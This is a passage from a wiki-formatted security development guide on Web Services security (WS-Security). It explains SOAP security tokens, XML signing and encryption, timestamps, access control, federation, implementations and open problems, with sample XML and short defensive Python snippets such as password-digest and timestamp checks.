             &amp;lt;dsig:DigestValue&amp;gt;5R3GSp+OOn17lSdE0knq4GXqgYM=&amp;lt;/dsig:DigestValue&amp;gt;&lt;br /&gt;
 	  &amp;lt;/dsig:Reference&amp;gt;&lt;br /&gt;
 	  &amp;lt;/dsig:SignedInfo&amp;gt;&lt;br /&gt;
 	  &amp;lt;dsig:SignatureValue Id=&amp;quot;a9utKU9UZk&amp;quot;&amp;gt;LIkagbCr5bkXLs8l...&amp;lt;/dsig:SignatureValue&amp;gt;&lt;br /&gt;
 	  &amp;lt;dsig:KeyInfo&amp;gt;&lt;br /&gt;
 	  &amp;lt;wsse:SecurityTokenReference&amp;gt;&lt;br /&gt;
 	    &amp;lt;wsse:Reference URI=&amp;quot;#aXhOJ5&amp;quot; ValueType=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509v3&amp;quot;/&amp;gt;&lt;br /&gt;
 	  &amp;lt;/wsse:SecurityTokenReference&amp;gt;&lt;br /&gt;
         &amp;lt;/dsig:KeyInfo&amp;gt;&lt;br /&gt;
       &amp;lt;/dsig:Signature&amp;gt;&lt;br /&gt;
     &amp;lt;/wsse:Security&amp;gt;&lt;br /&gt;
   &amp;lt;/soap:Header&amp;gt;&lt;br /&gt;
   &amp;lt;soap:Body xmlns:wsu=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd&amp;quot; wsu:Id=&amp;quot;s91397860&amp;quot;&amp;gt;&lt;br /&gt;
     &amp;lt;xenc:EncryptedData xmlns:xenc=&amp;quot;http://www.w3.org/2001/04/xmlenc#&amp;quot; Id=&amp;quot;aDNa2iD&amp;quot; Type=&amp;quot;http://www.w3.org/2001/04/xmlenc#Content&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xenc:EncryptionMethod Algorithm=&amp;quot;http://www.w3.org/2001/04/xmlenc#tripledes-cbc&amp;quot;/&amp;gt;&lt;br /&gt;
       &amp;lt;xenc:CipherData&amp;gt;&lt;br /&gt;
 	&amp;lt;xenc:CipherValue&amp;gt;XFM4J6C...&amp;lt;/xenc:CipherValue&amp;gt;&lt;br /&gt;
       &amp;lt;/xenc:CipherData&amp;gt;&lt;br /&gt;
     &amp;lt;/xenc:EncryptedData&amp;gt;&lt;br /&gt;
   &amp;lt;/soap:Body&amp;gt;&lt;br /&gt;
 &amp;lt;/soap:Envelope&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Types of tokens ===&lt;br /&gt;
&lt;br /&gt;
A WSS Header may have the following types of security tokens in it:&lt;br /&gt;
&lt;br /&gt;
* Username token&lt;br /&gt;
&lt;br /&gt;
Defines mechanisms to pass a username and, optionally, a password – the latter is described in the username profile document. Unless the whole token is encrypted, a message which includes a clear-text password should always be transmitted via a secured channel. In situations where the target Web Service has access to clear-text passwords for verification (this might not be possible with LDAP or some other user directories, which do not return clear-text passwords), using a hashed version with a nonce and a timestamp is generally preferable. The profile document defines an unambiguous algorithm for producing the password hash: &lt;br /&gt;
&lt;br /&gt;
 Password_Digest = Base64 ( SHA-1 ( nonce + created + password ) )&lt;br /&gt;
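A sketch of that computation in Python; the treatment of the nonce as raw bytes and of the created timestamp as UTF-8 text is an interpretation here, and the Username Token profile document remains authoritative.&lt;br /&gt;

```python
import base64
import hashlib
import os
from datetime import datetime, timezone

def password_digest(nonce: bytes, created: str, password: str) -> str:
    """Password_Digest = Base64(SHA-1(nonce + created + password))."""
    sha = hashlib.sha1(nonce + created.encode("utf-8") + password.encode("utf-8"))
    return base64.b64encode(sha.digest()).decode("ascii")

# A random nonce and a fresh creation time make the digest different on
# every request, even though the password itself never changes.
nonce = os.urandom(16)
created = datetime.now(timezone.utc).strftime("%Y-%m-%dT%H:%M:%SZ")
print(password_digest(nonce, created, "s3cret"))
```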
&lt;br /&gt;
* Binary token&lt;br /&gt;
&lt;br /&gt;
Binary tokens are used to convey binary data, such as X.509 certificates, in a text-encoded format, Base64 by default. The core specification defines the BinarySecurityToken element, while profile documents specify additional attributes and sub-elements to handle the attachment of various tokens. Presently, both the X.509 and the Kerberos profiles have been adopted.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
       &amp;lt;wsse:BinarySecurityToken EncodingType=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary&amp;quot; ValueType=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509v3&amp;quot; wsu:Id=&amp;quot;aXhOJ5&amp;quot;&amp;gt;&lt;br /&gt;
         MIICtzCCAi...&lt;br /&gt;
       &amp;lt;/wsse:BinarySecurityToken&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* XML token&lt;br /&gt;
&lt;br /&gt;
These are meant for any kind of XML-based token, but primarily for SAML assertions. The core specification merely mentions the possibility of inserting such tokens, leaving all details to the profile documents. At the moment, the SAML 1.1 profile has been accepted by OASIS.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 	&amp;lt;saml:Assertion AssertionID=&amp;quot;1106844369755&amp;quot; IssueInstant=&amp;quot;2005-01-27T16:46:09.755Z&amp;quot; Issuer=&amp;quot;www.my.com&amp;quot; MajorVersion=&amp;quot;1&amp;quot; MinorVersion=&amp;quot;1&amp;quot; xmlns:saml=&amp;quot;urn:oasis:names:tc:SAML:1.0:assertion&amp;quot;&amp;gt;&lt;br /&gt;
 		...				&lt;br /&gt;
 	&amp;lt;/saml:Assertion&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Although technically it is not a security token, a Timestamp element may be inserted into a security header to ensure the message’s freshness. See the further reading section for a design pattern on this.&lt;br /&gt;
&lt;br /&gt;
===Referencing message parts ===&lt;br /&gt;
&lt;br /&gt;
In order to retrieve security tokens passed in the message, or to identify signed and encrypted message parts, the core specification adopts a special attribute, wsu:Id. The only requirement on this attribute is that the values of such IDs must be unique within the scope of the XML document where they are defined. Its application has a significant advantage for intermediate processors, as it does not require an understanding of the message’s XML Schema. Unfortunately, the XML Signature and Encryption specifications do not allow for attribute extensibility (i.e. they have a closed schema), so, when trying to locate signature or encryption elements, the local IDs of the Signature and Encryption elements must be considered first.&lt;br /&gt;
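The schema-agnostic nature of a wsu:Id lookup can be illustrated with a short Python sketch; the element names here are invented for the example.&lt;br /&gt;

```python
import xml.etree.ElementTree as ET

WSU = "http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd"

doc = ET.fromstring(
    '<Envelope xmlns:wsu="%s">'
    '<Body wsu:Id="s91397860">payload</Body>'
    '</Envelope>' % WSU
)

def find_by_wsu_id(root, wanted):
    # No knowledge of the document's own schema is needed: simply walk
    # the tree and match on the namespace-qualified wsu:Id attribute.
    for elem in root.iter():
        if elem.get("{%s}Id" % WSU) == wanted:
            return elem
    return None

signed_part = find_by_wsu_id(doc, "s91397860")
print(signed_part.tag, signed_part.text)
```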
&lt;br /&gt;
WSS core specification also defines a general mechanism for referencing security tokens via SecurityTokenReference element. An example of such element, referring to a SAML assertion in the same header, is provided below:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 	&amp;lt;wsse:SecurityTokenReference wsu:Id=&amp;quot;aZG0sGbRpXLySzgM1X6aSjg22&amp;quot;&amp;gt;&lt;br /&gt;
 	  &amp;lt;wsse:KeyIdentifier ValueType=&amp;quot;http://docs.oasis-open.org/wss/2004/XX/oasis-2004XX-wss-saml-token-profile-1.0#SAMLAssertionID&amp;quot; wsu:Id=&amp;quot;a2tv1Uz&amp;quot;&amp;gt;&lt;br /&gt;
             1106844369755&lt;br /&gt;
           &amp;lt;/wsse:KeyIdentifier&amp;gt;&lt;br /&gt;
 	&amp;lt;/wsse:SecurityTokenReference&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
As this element was designed to refer to practically any possible token type (including encryption keys, certificates, SAML assertions, etc.), both internal and external to the WSS Header, it is enormously complicated. The specification recommends using two of its four possible reference types – Direct References (by URI) and Key Identifiers (some kind of token identifier). Profile documents (SAML and X.509, for instance) provide additional extensions to these mechanisms to take advantage of the specific qualities of different token types.&lt;br /&gt;
&lt;br /&gt;
==Communication Protection Mechanisms ==&lt;br /&gt;
&lt;br /&gt;
As was already explained earlier (see 0), channel security, while providing important services, is not a panacea, as it does not solve many of the issues facing Web Service developers. WSS helps address some of them at the SOAP message level, using the mechanisms described in the sections below.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
===Integrity ===&lt;br /&gt;
&lt;br /&gt;
The WSS specification makes use of the XML-dsig standard to ensure message integrity, restricting its functionality in certain cases; for instance, only explicitly referenced elements can be signed (i.e. no Enveloping or Enveloped signature modes are allowed). Prior to signing an XML document, a transformation is required to create its canonical representation, taking into account the fact that XML documents can be represented in a number of semantically equivalent ways. There are two main transformations defined by the XML Digital Signature WG at W3C, the Inclusive and Exclusive Canonicalization Transforms (C14N and EXC-C14N), which differ in the way namespace declarations are processed. The WSS core specification specifically recommends using EXC-C14N, as it allows copying signed XML content into other documents without invalidating the signature.&lt;br /&gt;
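The effect of canonicalization can be demonstrated with Python’s standard library. Note that ET.canonicalize() implements C14N 2.0 rather than the EXC-C14N transform named above, but the idea – mapping equivalent serializations to a single byte representation before digesting – is the same.&lt;br /&gt;

```python
import xml.etree.ElementTree as ET  # canonicalize() needs Python 3.8+

# Two semantically equivalent serializations of the same element:
# attribute order and the empty-element shorthand differ.
variant_a = '<Order id="7" total="9.99"/>'
variant_b = '<Order total="9.99" id="7"></Order>'

c14n_a = ET.canonicalize(xml_data=variant_a)
c14n_b = ET.canonicalize(xml_data=variant_b)

# Both map to the same canonical form, so a digest computed over the
# canonical bytes does not depend on accidents of serialization.
assert c14n_a == c14n_b
print(c14n_a)
```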
&lt;br /&gt;
In order to provide a uniform way of addressing signed tokens, WSS adds a Security Token Reference (STR) Dereference Transform option, which is comparable to dereferencing a pointer to an object of a specific data type in programming languages. Similarly, in addition to the XML Signature-defined ways of addressing signing keys, WSS allows for references to signing security tokens through the STR mechanism (explained in 0), extended by token profiles to accommodate specific token types. A typical signature example is shown in an earlier sample in section 0.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
Typically, an XML signature is applied to secure elements such as the SOAP Body and the timestamp, as well as any user credentials passed in the request. There is an interesting twist when a particular element is both signed and encrypted, since these operations may be applied (even repeatedly) in any order, and knowledge of their ordering is required for signature verification. To address this issue, the WSS core specification requires that each new element be pre-pended to the security header, thus defining the “natural” order of operations. A particularly nasty problem arises when there are several security headers in a single SOAP message, using overlapping signature and encryption blocks, as in this case there is nothing that would point to the right order of operations.&lt;br /&gt;
&lt;br /&gt;
===Confidentiality ===&lt;br /&gt;
&lt;br /&gt;
For confidentiality protection, WSS relies on yet another standard, XML Encryption. Similarly to XML-dsig, this standard operates on selected elements of the SOAP message, but it then replaces the encrypted element’s data with an &amp;lt;xenc:EncryptedData&amp;gt; sub-element carrying the encrypted bytes. For encryption efficiency, the specification recommends using a unique symmetric key, which is then encrypted with the recipient’s public key and pre-pended to the security header in an &amp;lt;xenc:EncryptedKey&amp;gt; element. A SOAP message with an encrypted body is shown in section 0.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
===Freshness ===&lt;br /&gt;
&lt;br /&gt;
SOAP messages’ freshness is addressed via a timestamp mechanism – each security header may contain just one such element, which states, in the UTC time format, the creation and expiration moments of the security header. It is important to realize that the timestamp is applied to the WSS Header, not to the SOAP message itself, since the latter may contain multiple security headers, each with a different timestamp. There is an unresolved problem with this “single timestamp” approach: once the timestamp is created and signed, it is impossible to update it without breaking existing signatures, even in the case of a legitimate change in the WSS Header.&lt;br /&gt;
&lt;br /&gt;
       &amp;lt;wsu:Timestamp wsu:Id=&amp;quot;afc6fbe-a7d8-fbf3-9ac4-f884f435a9c1&amp;quot;&amp;gt;&lt;br /&gt;
 	&amp;lt;wsu:Created&amp;gt;2005-01-27T16:46:10Z&amp;lt;/wsu:Created&amp;gt;&lt;br /&gt;
 	&amp;lt;wsu:Expires&amp;gt;2005-01-27T18:46:10Z&amp;lt;/wsu:Expires&amp;gt;&lt;br /&gt;
       &amp;lt;/wsu:Timestamp&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If a timestamp is included in a message, it is typically signed to prevent tampering and replay attacks. There is no mechanism foreseen to address the clock synchronization issue (which, as was already pointed out earlier, is generally not an issue in modern-day systems) – as far as the WSS mechanics are concerned, this has to be addressed out-of-band. See the further reading section for a design pattern addressing this issue.&lt;br /&gt;
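A receiver-side freshness check along these lines can be sketched as follows; the five-minute skew allowance is an arbitrary assumption, and a real implementation would take it from policy.&lt;br /&gt;

```python
from datetime import datetime, timedelta, timezone

MAX_CLOCK_SKEW = timedelta(minutes=5)  # assumed tolerated clock drift

def timestamp_is_fresh(created, expires, now=None):
    """Accept a header only inside its [Created, Expires] window,
    widened by a small allowance for unsynchronized clocks."""
    fmt = "%Y-%m-%dT%H:%M:%SZ"
    created_t = datetime.strptime(created, fmt).replace(tzinfo=timezone.utc)
    expires_t = datetime.strptime(expires, fmt).replace(tzinfo=timezone.utc)
    now = now or datetime.now(timezone.utc)
    return created_t - MAX_CLOCK_SKEW <= now <= expires_t + MAX_CLOCK_SKEW

# Probing the sample timestamp above at a moment inside its window:
probe = datetime(2005, 1, 27, 17, 0, 0, tzinfo=timezone.utc)
print(timestamp_is_fresh("2005-01-27T16:46:10Z",
                         "2005-01-27T18:46:10Z", now=probe))  # True
```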
&lt;br /&gt;
==Access Control Mechanisms ==&lt;br /&gt;
&lt;br /&gt;
When it comes to access control decisions, Web Services do not offer specific protection mechanisms by themselves – they just have the means to carry the tokens and data payloads in a secure manner between source and destination SOAP endpoints. &lt;br /&gt;
&lt;br /&gt;
For a more complete description of access control tasks, please refer to other sections of this Development Guide.&lt;br /&gt;
&lt;br /&gt;
===Identification ===&lt;br /&gt;
&lt;br /&gt;
Identification represents a claim to a certain identity, expressed by attaching certain information to the message. This can be a username, a SAML assertion, a Kerberos ticket, or any other piece of information from which the service can infer who the caller claims to be. &lt;br /&gt;
&lt;br /&gt;
WSS represents a very good way to convey this information, as it defines an extensible mechanism for attaching various token types to a message (see 0). It is the receiver’s job to extract the attached token and figure out which identity it carries, or to reject the message if it can find no acceptable token in it.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
===Authentication ===&lt;br /&gt;
&lt;br /&gt;
Authentication can come in two flavors – credential verification or token validation. The subtle difference between the two is that tokens are issued after some kind of authentication has already happened prior to the current invocation, and they usually contain the user’s identity along with proof of its integrity. &lt;br /&gt;
&lt;br /&gt;
WSS offers support for a number of standard authentication protocols by defining a binding mechanism for transmitting protocol-specific tokens and reliably linking them to the sender. However, the mechanics of proving that the caller is who he claims to be are completely at the Web Service’s discretion. Whether it takes the supplied username and password hash and checks it against the backend user store, or extracts the subject name from the X.509 certificate used for signing the message, verifies the certificate chain, and looks up the user in its store – at the moment, there are no requirements or standards which would dictate that it should be done one way or another. &lt;br /&gt;
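For example, a service verifying a hashed UsernameToken might recompute the digest from its own copy of the password and compare, roughly as follows; the user store and the handling of the fields are hypothetical illustrations, not mandated by any profile.&lt;br /&gt;

```python
import base64
import hashlib

# Hypothetical backend store with clear-text passwords available
# (as noted earlier, not every user directory can provide these).
USER_STORE = {"alice": "s3cret"}

def verify_username_token(username, nonce_b64, created, digest_b64):
    """Recompute Base64(SHA-1(nonce + created + password)) from the
    stored password and compare it with the digest the caller sent."""
    password = USER_STORE.get(username)
    if password is None:
        return False
    nonce = base64.b64decode(nonce_b64)
    expected = base64.b64encode(
        hashlib.sha1(nonce + created.encode() + password.encode()).digest()
    ).decode("ascii")
    # A real service would also reject previously seen nonces and stale
    # `created` values to block replayed tokens.
    return expected == digest_b64

nonce_b64 = base64.b64encode(b"0123456789abcdef").decode("ascii")
created = "2005-01-27T16:46:10Z"
sent = base64.b64encode(hashlib.sha1(
    b"0123456789abcdef" + created.encode() + b"s3cret").digest()).decode("ascii")
print(verify_username_token("alice", nonce_b64, created, sent))  # True
```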
&lt;br /&gt;
===Authorization ===&lt;br /&gt;
&lt;br /&gt;
XACML may be used for expressing authorization rules, but its usage is not Web Service-specific – it has a much broader scope. So, whatever policy- or role-based authorization mechanism the host server already has in place will most likely be utilized to protect the deployed Web Services as well. &lt;br /&gt;
&lt;br /&gt;
Depending on the implementation, there may be several layers of authorization involved at the server. For instance, JSRs 224 (JAX-RPC 2.0) and 109 (Implementing Enterprise Web Services), which define the Java binding for Web Services, specify implementing Web Services in J2EE containers. This means that when a Web Service is accessed, there will be a URL authorization check executed by the J2EE container, followed by a check at the Web Service layer for the Web Service-specific resource. The granularity of such checks is implementation-specific and is not dictated by any standards. In the Windows universe it happens in a similar fashion, since IIS is going to execute its access checks on the incoming HTTP calls before they reach the ASP.NET runtime, where the SOAP message is going to be further decomposed and analyzed.&lt;br /&gt;
&lt;br /&gt;
===Policy Agreement ===&lt;br /&gt;
&lt;br /&gt;
Normally, Web Service communication is based on the endpoint’s public interface, defined in its WSDL file. This descriptor has sufficient details to express SOAP binding requirements, but it does not define any security parameters, leaving Web Service developers struggling to find out-of-band mechanisms to determine the endpoint’s security requirements. &lt;br /&gt;
&lt;br /&gt;
To make up for these shortcomings, the WS-Policy specification was conceived as a mechanism for expressing complex policy requirements and qualities – a sort of WSDL on steroids. Through the published policy, SOAP endpoints can advertise their security requirements, and their clients can apply the appropriate measures of message protection when constructing requests. The general WS-Policy specification (actually comprised of three separate documents) also has extensions for specific policy types, one of them, WS-SecurityPolicy, for security.&lt;br /&gt;
&lt;br /&gt;
If the requestor does not possess the required tokens, it can try obtaining them via the trust mechanism, using WS-Trust-enabled services, which are called to securely exchange various token types for the requested identity. &lt;br /&gt;
&lt;br /&gt;
[[Image: Using Trust Service.gif|Figure 5. Using Trust service]]&lt;br /&gt;
&lt;br /&gt;
Unfortunately, neither the WS-Policy nor the WS-Trust specification has been submitted for standardization to public bodies, and their development is progressing via the private collaboration of several companies, although it has been opened up to other participants as well. As a positive factor, several interoperability events have been conducted for these specifications, so the development process of these critical links in the Web Services security infrastructure is not a complete black box.&lt;br /&gt;
&lt;br /&gt;
==Forming Web Service Chains ==&lt;br /&gt;
&lt;br /&gt;
Many existing or planned implementations of SOA or B2B systems rely on dynamic chains of Web Services for accomplishing various business specific tasks, from taking the orders through manufacturing and up to the distribution process. &lt;br /&gt;
&lt;br /&gt;
[[Image:Service Chain.gif|Figure 6: Service chain]]&lt;br /&gt;
&lt;br /&gt;
That is the theory. In practice, there are a lot of obstacles hidden along the way, and one of the major ones is security concerns about publicly exposing processing functions to intranet- or Internet-based clients. &lt;br /&gt;
&lt;br /&gt;
Here are just a few of the issues that hamper Web Services interaction: incompatible authentication and authorization models for users, the amount of trust between the services themselves and the ways of establishing such trust, maintaining secure connections, and the synchronization of user directories or otherwise exchanging users’ attributes. These issues are briefly tackled in the following paragraphs.&lt;br /&gt;
&lt;br /&gt;
===Incompatible user access control models ===&lt;br /&gt;
&lt;br /&gt;
As explained earlier, in section 0, Web Services themselves do not include separate extensions for access control, relying instead on the existing security framework. What they do provide, however, are mechanisms for discovering and describing security requirements of a SOAP service (via WS-Policy), and for obtaining appropriate security credentials via WS-Trust based services.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
===Service trust ===&lt;br /&gt;
&lt;br /&gt;
In order to establish mutual trust, a client and a service have to satisfy each other’s policy requirements. A simple and popular model is mutual certificate authentication via SSL, but it does not scale for open service models and supports only one authentication type. Services that require more flexibility have to use pretty much the same access control mechanisms as are used with users to establish each other’s identities prior to engaging in a conversation.&lt;br /&gt;
&lt;br /&gt;
===Secure connections ===&lt;br /&gt;
&lt;br /&gt;
Once trust is established, it would be impractical to require its confirmation on each interaction. Instead, a secure client-server link is formed and maintained for the entire time a client’s session is active. Again, the most popular mechanism today for maintaining such a link is SSL, but it is not a Web Service-specific mechanism, and it has a number of shortcomings when applied to SOAP communication, as explained in 0.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
===Synchronization of user directories ===&lt;br /&gt;
&lt;br /&gt;
This is a very acute problem when dealing with cross-domain applications, as the user population tends to change frequently among different domains. So, how does a service in domain B decide whether it is going to trust a user’s claim that he has already been authenticated in domain A? There are different aspects to this problem. The first is a common SSO mechanism, which implies that a user is known in both domains (through synchronization, or by some other means), and that authentication tokens from one domain are acceptable in the other. In the Web Services world, this would be accomplished by passing around a SAML or Kerberos token for the user. &lt;br /&gt;
&lt;br /&gt;
===Domain federation ===&lt;br /&gt;
&lt;br /&gt;
Another aspect of the problem arises when users are not shared across domains, and only the fact that a user with a certain ID has successfully authenticated in another domain is communicated – as would be the case with several large corporations that would like to form a partnership but are reluctant to share customers’ details. The decision to accept such a request is then based on inter-domain procedures, establishing special trust relationships and allowing for the exchange of such opaque tokens; this is an example of a Federation relationship. Of those efforts, the most notable example is the Liberty Alliance project, which is now being used as a basis for the SAML 2.0 specifications. The work in this area is still far from complete, and most existing deployments are proofs of concept or internal pilot projects rather than real cross-company deployments, although LA’s website does list some case studies of large-scale projects.&lt;br /&gt;
&lt;br /&gt;
==Available Implementations ==&lt;br /&gt;
&lt;br /&gt;
It is important to realize from the beginning that no security standard by itself is going to provide security to message exchanges – it is the installed implementations that assess the conformance of incoming SOAP messages to the applicable standards, and appropriately secure the outgoing ones.&lt;br /&gt;
&lt;br /&gt;
===.NET – Web Service Extensions ===&lt;br /&gt;
&lt;br /&gt;
Since new standards are being developed at a rather quick pace, the .NET platform does not try to incorporate them immediately, but uses Web Service Extensions (WSE) instead. WSE, currently at version 2.0, adds development and runtime support for the latest Web Service security standards to the platform and development tools, even while they are still “work in progress”. Once standards mature, their support is incorporated into new releases of the .NET platform, which is what is going to happen when .NET 2.0 is finally released. The next release of WSE, 3.0, is going to coincide with the VS.2005 release and will take advantage of the latest innovations of the .NET 2.0 platform in the messaging and Web Application areas. [[Category:FIXME|old dates, is this current info?]]&lt;br /&gt;
&lt;br /&gt;
Considering that Microsoft is one of the most active players in the Web Service security area and recognizing its influence in the industry, its WSE implementation is probably one of the most complete and up to date, and it is strongly advisable to run at least a quick interoperability check with WSE-secured .NET Web Service clients. If you have a Java-based Web Service, and the interoperability is a requirement (which is usually the case), in addition to the questions of security testing one needs to keep in mind the basic interoperability between Java and .NET Web Service data structures. &lt;br /&gt;
&lt;br /&gt;
This is especially important since current versions of .NET Web Service tools frequently do not cleanly handle WS-Security’s schema and the related XML schemas as published by OASIS, so some creativity on the part of a Web Service designer is needed. That said – the WSE package itself contains very rich and well-structured functionality, which can be utilized with both ASP.NET-based and standalone Web Service clients to check incoming SOAP messages and secure outgoing ones at the infrastructure level, relieving Web Service programmers of these details. Among other things, WSE 2.0 supports the most recent set of WS-Policy and WS-Security profiles, providing for basic message security and WS-Trust with WS-SecureConversation. Those are needed for establishing secure exchanges and sessions – similar to what SSL does at the transport level, but applied to message-based communication.&lt;br /&gt;
&lt;br /&gt;
===Java toolkits ===&lt;br /&gt;
&lt;br /&gt;
Most of the publicly available Java toolkits work at the level of XML security, i.e. XML-dsig and XML-enc – such as IBM’s XML Security Suite and Apache’s XML Security Java project. Java’s JSR 105 and JSR 106 (still not finalized) define Java bindings for signatures and encryption, which will allow plugging the implementations as JCA providers once work on those JSRs is completed. &lt;br /&gt;
&lt;br /&gt;
Moving one level up, to address Web Services themselves, the picture becomes muddier – at the moment, there are many implementations in various stages of incompleteness. For instance, Apache is currently working on the WSS4J project, which is moving rather slowly, and there is a commercial software package from Phaos (now owned by Oracle), which suffers from a lot of implementation problems.&lt;br /&gt;
&lt;br /&gt;
A popular choice among Web Service developers today is Sun’s JWSDP, which includes support for Web Service security. However, its support for the Web Service security specifications in version 1.5 is limited to an implementation of the core WSS standard with username and X.509 certificate profiles. Security features are implemented as part of the JAX-RPC framework and are configuration-driven, which allows for clean separation from the Web Service’s implementation.&lt;br /&gt;
&lt;br /&gt;
===Hardware, software systems ===&lt;br /&gt;
&lt;br /&gt;
This category includes complete systems, rather than toolkits or frameworks. On one hand, they usually provide rich functionality right off the shelf; on the other hand, their usage model is rigidly constrained by the solution’s architecture and implementation. This is in contrast to the toolkits, which do not provide any services by themselves, but hand system developers the tools necessary to include the desired Web Service security features in their products… or to shoot themselves in the foot by applying them inappropriately.&lt;br /&gt;
&lt;br /&gt;
These systems can be used at the infrastructure layer to verify incoming messages against the effective policy, checking signatures, tokens, etc., before passing them on to the target Web Service. When applied to outgoing SOAP messages, they act as a proxy, altering the messages to decorate them with the required security elements, and signing and/or encrypting them.&lt;br /&gt;
&lt;br /&gt;
Software systems are characterized by significant configuration flexibility, but comparatively slow processing. On the bright side, they often provide a high level of integration with the existing enterprise infrastructure, relying on back-end user and policy stores to view the credentials, extracted from the WSS header, from a broader perspective. An example of such a service is TransactionMinder from the former Netegrity – a Policy Enforcement Point for the Web Services behind it, layered on top of the Policy Server, which makes policy decisions by checking the extracted credentials against the configured stores and policies.&lt;br /&gt;
&lt;br /&gt;
For hardware systems, performance is the key – they have already broken the gigabyte processing threshold, and allow for real-time processing of huge documents, decorated according to a variety of the latest Web Service security standards, not only WSS. Usage simplicity is another attractive point of these systems – in the most trivial cases, the hardware box may literally be dropped in, plugged in, and used right away. These qualities come at a price, however – this performance and simplicity can be achieved only as long as the user stays within the pre-configured confines of the hardware box. The moment he tries to integrate with back-end stores via callbacks (for those solutions that have this capability, since not all of them do), most of the advantages are lost. As an example of such a hardware device, Layer 7 Technologies provides a scalable SecureSpan Networking Gateway, which acts both as an inbound firewall and an outbound proxy to handle XML traffic in real time.&lt;br /&gt;
&lt;br /&gt;
==Problems ==&lt;br /&gt;
&lt;br /&gt;
As is probably clear from the previous sections, Web Services are still experiencing a lot of turbulence, and it will take a while before they can really catch on. Here is a brief look at what problems surround currently existing security standards and their implementations.&lt;br /&gt;
&lt;br /&gt;
===Immaturity of the standards ===&lt;br /&gt;
&lt;br /&gt;
Most of the standards are either very recent (a couple of years old at most) or still being developed. Although standards development is done in committees, which, presumably, reduces risk through an exhaustive review and comment process, some error scenarios still slip in periodically, as no theory can possibly match the testing that results from pounding by thousands of developers working in the field. &lt;br /&gt;
&lt;br /&gt;
Additionally, it does not help that for political reasons some of these standards are withheld from public process, which is the case with many standards from the WSA arena (see 0), or that some of the efforts are duplicated, as was the case with LA and WS-Federation specifications.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
===Performance ===&lt;br /&gt;
&lt;br /&gt;
XML parsing is a slow task – an accepted reality – and SOAP processing slows it down even more. Now, with expensive cryptographic and textual conversion operations thrown into the mix, these tasks become a performance bottleneck, even with the latest crypto- and XML-processing hardware solutions offered today. All of the products currently on the market face this issue, and they are trying to resolve it with varying degrees of success. &lt;br /&gt;
&lt;br /&gt;
Hardware solutions, while improving performance substantially (by orders of magnitude), cannot always be used as an optimal solution, as they cannot be easily integrated with the already existing back-end software infrastructure – at least, not without making performance sacrifices. Another consideration in deciding whether hardware-based systems are the right solution is that they are usually highly specialized in what they do, while modern Application Servers and security frameworks can usually offer a much greater variety of protection mechanisms, protecting not only Web Services but also other deployed applications in a uniform and consistent way.&lt;br /&gt;
&lt;br /&gt;
===Complexity and interoperability ===&lt;br /&gt;
&lt;br /&gt;
As could be deduced from the previous sections, Web Service security standards are fairly complex and have a very steep learning curve associated with them. Most of the current products dealing with Web Service security suffer from very mediocre usability due to the complexity of the underlying infrastructure. Configuring all the different policies, identities, keys, and protocols takes a lot of time and a good understanding of the technologies involved, since most of the time the errors that end users see carry very cryptic and misleading descriptions. &lt;br /&gt;
&lt;br /&gt;
In order to help administrators and reduce the security risks of service misconfiguration, many companies develop policy templates, which group together best practices for protecting incoming and outgoing SOAP messages. Unfortunately, this work is not currently on the radar of any of the standards bodies, so it appears unlikely that such templates will be released for public use any time soon. Closest to this effort may be WS-I’s Basic Security Profile (BSP), which tries to define the rules for better interoperability among Web Services, using a subset of common security features from various security standards like WSS. However, this work is not aimed at supplying administrators with ready-for-deployment security templates matching the most popular business use cases, but rather at establishing the least common denominator.&lt;br /&gt;
&lt;br /&gt;
===Key management ===&lt;br /&gt;
&lt;br /&gt;
Key management usually lies at the foundation of any other security activity, as most protection mechanisms rely on cryptographic keys one way or another. While Web Services have the XKMS protocol for key distribution, local key management still presents a huge challenge in most cases, since the PKI mechanism has a lot of well-documented deployment and usability issues. Systems that opt to use homegrown mechanisms for key management run significant risks, since the questions of storing, updating, and recovering secret and private keys are more often than not inadequately addressed in such solutions.&lt;br /&gt;
&lt;br /&gt;
==Further Reading ==&lt;br /&gt;
&lt;br /&gt;
* SearchSOA, SOA needs practical operational governance, Toufic Boubez&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://searchsoa.techtarget.com/news/interview/0,289202,sid26_gci1288649,00.html?track=NL-110&amp;amp;ad=618937&amp;amp;asrc=EM_NLN_2827289&amp;amp;uid=4724698&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Whitepaper: Securing XML Web Services: XML Firewalls and XML VPNs&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://layer7tech.com/new/library/custompage.html?id=4&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
